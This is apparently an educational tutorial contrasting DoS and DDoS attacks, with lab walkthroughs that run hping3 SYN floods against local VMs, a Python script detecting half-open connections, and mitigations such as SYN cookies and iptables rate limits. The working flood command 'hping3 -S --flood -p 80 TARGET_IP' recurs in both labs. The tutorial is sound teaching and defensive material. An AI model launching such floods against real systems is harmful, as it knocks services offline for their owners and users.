
1. DoS (Denial of Service)

A DoS attack is carried out by a single source to exhaust system resources (CPU, memory, bandwidth) and disrupt normal operations.

Types of DoS Attacks:

  • Volumetric Attacks – Flooding the target with excessive traffic (e.g., UDP flood, ICMP flood).
  • Protocol Attacks – Exploiting weaknesses in network protocols (e.g., SYN flood, Ping of Death).
  • Application Layer Attacks – Targeting web applications (e.g., HTTP Flood, Slowloris attack).

Example:

A hacker continuously sends ping requests (ICMP flood) to a web server, consuming its resources and causing it to crash.


2. DDoS (Distributed Denial of Service)

A DDoS attack is a large-scale attack performed using multiple compromised devices (botnet), making it harder to mitigate.

How it Works:

  • The attacker infects multiple computers or IoT devices with malware.
  • These devices (the botnet) receive instructions to flood the target.
  • The massive traffic volume overwhelms the system, causing downtime.

Types of DDoS Attacks:

  • Volumetric Attacks – Large-scale traffic floods from multiple sources (e.g., DNS Amplification, NTP Amplification).
  • Protocol Attacks – Exploiting vulnerabilities at the transport and network layers (e.g., SYN flood).
  • Application Layer Attacks – Targeting application resources (e.g., HTTP GET/POST Flood).

Example:

A hacker uses a botnet of thousands of infected devices to flood an e-commerce website with HTTP requests, making it inaccessible.


Key Differences:

| Feature | DoS | DDoS |
|---|---|---|
| Attack source | Single machine | Multiple machines (botnet) |
| Scale of attack | Small to medium | Large-scale, more powerful |
| Complexity | Simple to detect & block | Harder to mitigate due to multiple sources |
| Mitigation | Firewall, rate limiting | DDoS protection services (Cloudflare, AWS Shield) |

How to Prevent DoS & DDoS Attacks

βœ”οΈ Use a Web Application Firewall (WAF)
βœ”οΈ Implement rate limiting and traffic filtering
βœ”οΈ Use DDoS protection services (Cloudflare, Akamai, AWS Shield)
βœ”οΈ Monitor network traffic for anomalous activity
βœ”οΈ Deploy CDNs (Content Delivery Networks) to distribute traffic


🧪 DoS Attack Demonstration using hping3 (Educational Tutorial)

⚠️ Disclaimer: This tutorial is for educational purposes only. Never perform DoS attacks on public or unauthorized systems. Only test in isolated environments you control (e.g., VMs, Docker, local LAN).


πŸ› οΈ What You’ll Learn

  • How to simulate a basic SYN Flood Attack using hping3

  • How the target machine reacts

  • How to monitor and optionally defend against it


🧰 Requirements

| Role | System | Tools Needed |
|---|---|---|
| Attacker | VM or Host | hping3 |
| Target | VM or Host | Python / Netcat listener |

🔧 Step 1: Set Up the Target Machine

🔹 Option A: Run a simple HTTP server

sudo python3 -m http.server 80

🔹 Option B: Use Netcat to open port 80

sudo nc -lvp 80

Keep this terminal open. It simulates a real server listening for connections.


💣 Step 2: Launch a SYN Flood from the Attacker Machine

✅ Install hping3

Ubuntu/Debian:

sudo apt update
sudo apt install hping3 -y

Fedora/RHEL:

sudo dnf install hping3 -y

🔥 Run the Attack (SYN Flood)

sudo hping3 -S --flood -V -p 80 TARGET_IP

Replace TARGET_IP with the IP address of your target machine.

✅ What each flag means:

  • -S: Sends SYN packets (like initiating a TCP handshake)

  • --flood: Sends packets rapidly, as fast as possible

  • -V: Enables verbose output

  • -p 80: Sends packets to port 80


📊 Step 3: Observe Target Behavior

On the Target machine:

sudo netstat -ant | grep :80

Or:

ss -s

You’ll likely see a lot of SYN_RECV entries: these are half-open connections, indicating a SYN flood.


📉 What Happens?

  • The target’s CPU/network may spike

  • Services on port 80 may slow down or become unresponsive

  • You’re seeing a resource exhaustion attack in action


πŸ›‘οΈ Step 4: Mitigation (Optional)

πŸ”Έ Enable SYN Cookies

sudo sysctl -w net.ipv4.tcp_syncookies=1

🔸 Apply Iptables Rate Limiting

sudo iptables -A INPUT -p tcp --syn -m limit --limit 1/s --limit-burst 3 -j ACCEPT
sudo iptables -A INPUT -p tcp --syn -j DROP

🔸 Monitor with iftop or tcpdump

sudo apt install iftop
sudo iftop -i eth0

🧪 Bonus: Use Docker for a Self-Contained Lab

Let me know if you want a Docker-based version of this demo (attacker and victim as separate containers). Super handy for safe, repeatable labs.


✅ Summary

| Step | Action |
|---|---|
| 1. Setup | Simple server on target (python3 -m http.server) |
| 2. Install | Install hping3 on attacker machine |
| 3. Launch | Run hping3 -S --flood -p 80 TARGET_IP |
| 4. Observe | Use netstat, ss, or htop on target |
| 5. Optional | Apply mitigation like SYN cookies / iptables |

🧪 DDoS Attack Simulation using hping3 (Educational Tutorial)

⚠️ Legal Notice: DDoS attacks are illegal on public infrastructure. This guide is strictly educational and must be run in a private network that you own, such as a local lab, virtual machines, or Docker setup.


🎯 What You’ll Do

  • Set up 1 victim server and 2+ attacker systems (VMs, Docker, or even WSL)

  • Use hping3 on each attacker to simulate a coordinated SYN Flood

  • Observe the impact on the victim machine

  • Learn about DDoS mitigation


🧰 Requirements

| Machine | Role | Requirements |
|---|---|---|
| VM1 | Victim | Python or Netcat |
| VM2, VM3... | Attackers | hping3 installed |

Use VirtualBox, VMware, or Docker with separate IPs in a NAT/host-only network.


🔧 Step 1: Set Up the Victim Server

On the victim machine (VM1):

Option A: Python HTTP Server

sudo python3 -m http.server 80

Option B: Netcat Listener

sudo nc -lvp 80

🚀 Step 2: Prepare the Attackers

On each attacker machine (VM2, VM3, etc.), install hping3:

sudo apt update
sudo apt install hping3 -y

💥 Step 3: Launch the DDoS (Simulated)

On each attacker, run the following command (change TARGET_IP to the IP of the victim):

sudo hping3 -S --flood -V -p 80 TARGET_IP

Run this simultaneously from multiple attacker VMs to simulate a DDoS.


📊 Step 4: Observe the Attack

On the victim machine:

Run:

sudo netstat -ant | grep :80

Or:

sudo ss -s

You’ll see a surge in SYN_RECV connections: this means multiple systems are overwhelming the target with TCP requests, simulating a distributed SYN flood.
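As an added example (not part of the original tutorial), the script below turns the manual `netstat -ant | grep :80` check from Step 3 of the DoS lab and Step 4 here into a small detector: it counts half-open (SYN_RECV) connections per peer address and reports whether the flood comes from one source or several. The sample netstat output, the peer addresses and the thresholds are constructed for the example; on a real server the thresholds must be tuned to the normal size of the accept backlog.

```python
from collections import Counter

# Constructed sample of `sudo netstat -ant | grep :80` on the victim (not a
# real capture): two established clients plus half-open entries from three peers.
# Note: netstat prints the state as SYN_RECV; `ss -tan` prints it as SYN-RECV
# in the first column, so this parser expects netstat's layout.
SAMPLE_NETSTAT = """\
tcp        0      0 10.0.0.5:80             10.0.0.20:51000         ESTABLISHED
tcp        0      0 10.0.0.5:80             10.0.0.9:41234          SYN_RECV
tcp        0      0 10.0.0.5:80             10.0.0.9:41235          SYN_RECV
tcp        0      0 10.0.0.5:80             10.0.0.9:41236          SYN_RECV
tcp        0      0 10.0.0.5:80             10.0.0.11:33001         SYN_RECV
tcp        0      0 10.0.0.5:80             10.0.0.11:33002         SYN_RECV
tcp        0      0 10.0.0.5:80             10.0.0.12:60001         SYN_RECV
tcp        0      0 10.0.0.5:80             10.0.0.12:60002         SYN_RECV
tcp        0      0 10.0.0.5:80             10.0.0.21:51001         ESTABLISHED
"""


def half_open_by_peer(netstat_text, local_port=80):
    """Count SYN_RECV (half-open) connections to local_port, keyed by peer IP."""
    counts = Counter()
    for line in netstat_text.splitlines():
        fields = line.split()
        # netstat -ant rows: proto recv-q send-q local foreign state
        if len(fields) < 6 or fields[-1] != "SYN_RECV":
            continue
        local, foreign = fields[3], fields[4]
        if not local.endswith(":%d" % local_port):
            continue
        peer_ip = foreign.rsplit(":", 1)[0]  # drop the ephemeral source port
        counts[peer_ip] += 1
    return counts


def assess_syn_flood(netstat_text, threshold=5, distributed_from=3):
    """Summarise the half-open table: total, distinct sources, top offenders, verdict.
    threshold / distributed_from are assumed values sized for the sample above."""
    counts = half_open_by_peer(netstat_text)
    total = sum(counts.values())
    if total < threshold:
        verdict = "normal"
    elif len(counts) >= distributed_from:
        verdict = "distributed SYN flood"   # many peers: the DDoS pattern
    else:
        verdict = "single-source SYN flood"  # one or two peers: the DoS pattern
    return {"half_open": total, "sources": len(counts),
            "top": counts.most_common(3), "verdict": verdict}


if __name__ == "__main__":
    print(assess_syn_flood(SAMPLE_NETSTAT))
```

Once SYN cookies are enabled and the backlog fills, the kernel stops queuing new half-open entries, so this count falls even while the flood continues; pair it with the iftop or tcpdump view of inbound packet rates.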


📈 Optional: Monitor with iftop or tcpdump

sudo apt install iftop
sudo iftop -i eth0

Or:

sudo tcpdump -i eth0 port 80

You’ll see traffic flooding in from multiple attacker IPs.


πŸ›‘οΈ Step 5: Mitigation Techniques

πŸ” 1. Enable SYN Cookies

sudo sysctl -w net.ipv4.tcp_syncookies=1

πŸ” 2. Rate Limit with Iptables

sudo iptables -A INPUT -p tcp --syn -m limit --limit 2/s --limit-burst 5 -j ACCEPT
sudo iptables -A INPUT -p tcp --syn -j DROP

πŸ” 3. Use Fail2Ban or TCPShield for dynamic banning (advanced)


✅ Summary

| Step | Description |
|---|---|
| Step 1 | Start web server on victim |
| Step 2 | Install hping3 on attackers |
| Step 3 | Run SYN flood from multiple attacker machines |
| Step 4 | Monitor victim with netstat, iftop, etc. |
| Step 5 | Try mitigations like iptables or SYN cookies |